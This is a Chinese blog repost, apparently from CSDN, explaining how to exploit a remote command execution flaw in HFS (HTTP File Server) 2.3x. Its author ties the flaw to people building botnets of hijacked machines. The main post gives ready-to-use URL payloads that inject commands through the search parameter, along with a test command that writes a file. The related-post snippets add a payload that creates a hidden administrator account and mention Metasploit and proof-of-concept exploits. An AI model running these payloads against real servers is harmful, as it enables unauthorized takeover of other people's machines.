国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙...

最新推荐文章于 2024-07-07 03:02:46 发布
最新推荐文章于 2024-07-07 03:02:46 发布
阅读量724 收藏 2
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/hackerschina/p/4788716.html
本文详细介绍了如何使用特定程序进行非法活动,包括在国内广泛使用的工具,以及通过设置URL参数来执行命令行操作,实现对目标系统的非法控制。通过测试案例展示了如何利用该程序进行恶意行为的验证。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。

1
2
http://localhost:80/?search==%00{.exec|cmd.}
http://localhost:80/search=%00{.exec|cmd.}

注:有些版本search前面是没有?的。

测试部分:
百度搜HFS默认就是2.3x版本,执行echo测试成功:

1
http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.}

转载于:https://www.cnblogs.com/hackerschina/p/4788716.html

HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 6080
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
HFS Cmd执行漏洞入侵与防御
u010005482的专栏
09-19 5923
最近爆出了HFS(Http File Server)爆出了这个漏洞
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
HFS远程命令执行漏洞(RCE)
weixin_30527323的博客
03-20 3493
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2HFSHFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6674
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
漏洞利用-(HFS-RCE远程命令执行)
my的博客
07-04 2030
概念验证是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。概念验证通常被认为是一个有里程碑意义的实现的原型。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。
hfs.zip_HFS大气简约模板_hfs_hfs 模板_hfs2.3m模板_wantzuv
09-15
这款模板名为"hfs.zip_HFS大气简约模板_hfs_hfs 模板_hfs2.3m模板_wantzuv",由wantzuv可能参与制作,特别适用于HFS 2.3m版本。 HFS(Http File Server)的核心功能包括: 1. 文件上传与下载:用户可以通过网页...
HFS文件服务器RCE 漏洞复现(CVE-2024-23692
huangyongkang666的博客
06-11 6558
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
安全开发-HFS漏洞利用脚本编写
niqiu320的博客
05-12 1198
0x01 安全开发-HFS漏洞利用脚本编写 下载并在虚拟机2008里面(因为主机防火墙缘故)开启HFS~网络文件服务器 2.3Beta 一、攻击准备 复制HFSIP在浏览器中,并且在IP后添加用户exp /?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20TechSupport%20admin.12345%20/add%20%26%20net%20localgroup%20administrators%20admin.12345%20/add.%7D
SSRF利用HFS远程命令执行漏洞(RCE)
qq_45884775的博客
04-09 5356
0x00SSRF漏洞介绍: SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。 0x01SSRF漏洞原理: SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。SSRF是利用存在缺陷的we
HFS修复漏洞
09-20
HFS修复漏洞
hfs 2.3m Build #300
12-28
在个人电脑上搭建http服务器,让其它朋友直接访问并下载,操作简单方便。
hfs2.3 Ftp Server
06-05
HFS,它是一种上传文件的软件。 专为个人用户所设计的 HTTP 档案系统 - Http File Server,如果您觉得架设 FTP Server 太麻烦,那么这个软件可以提供您更方便的档案传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者,直接将欲加入的档案拖曳至此窗口,便可架设完成。
hfs2.3 汉化版
08-25
软件说明: HTTP搭建工具 hfs2.3中文汉化版. 本地HTTP搭建工具 HFS 汉化版hfs2.3中文汉化版hfs2.3中文汉化版.hfs2.3中文汉化版
hsf服务器HFS网络文件服务器V2.3Beta完美汉化版很好的一个文件传输软件,和FTP一样的稳定性,但用的确实HTTP协议,文件传输好,汉化版简单易用!...
02-17
HFS网络文件服务器V2.3Beta完美汉化版很好的一个文件传输软件,和FTP一样的稳定性,但用的确实HTTP协议,文件传输好,汉化版简单易用!... HFS网络文件服务器V2.3Beta完美汉化版很好的一个文件传输软件,和FTP一样的稳定性,但用的确实HTTP协议,文件传输好,汉化版简单易用!...
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 2446
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
Rejetto HFS 服务器存在严重漏洞受到攻击
最新发布
网络研究观
07-07 1901
客正在针对旧版本的 Rejetto HTTP 文件服务器 (HFS) 注入恶意软件和加密货币挖矿程序
HFS远程命令执行漏洞入侵阔服务器
aiquan9342的博客
12-24 1577
先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便...
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 2223
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
HFS2.3中文汉化版发布:本地HTTP搭建工具轻松搭建
由于压缩包文件名称列表中只提供了一个单一的文件名“hfs2.3中文汉化版”,我们无法从这个列表中得知具体包含的文件和目录结构,但可以合理推测该压缩包内可能包含以下内容: - HFS软件的主程序文件,用于运行HTTP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值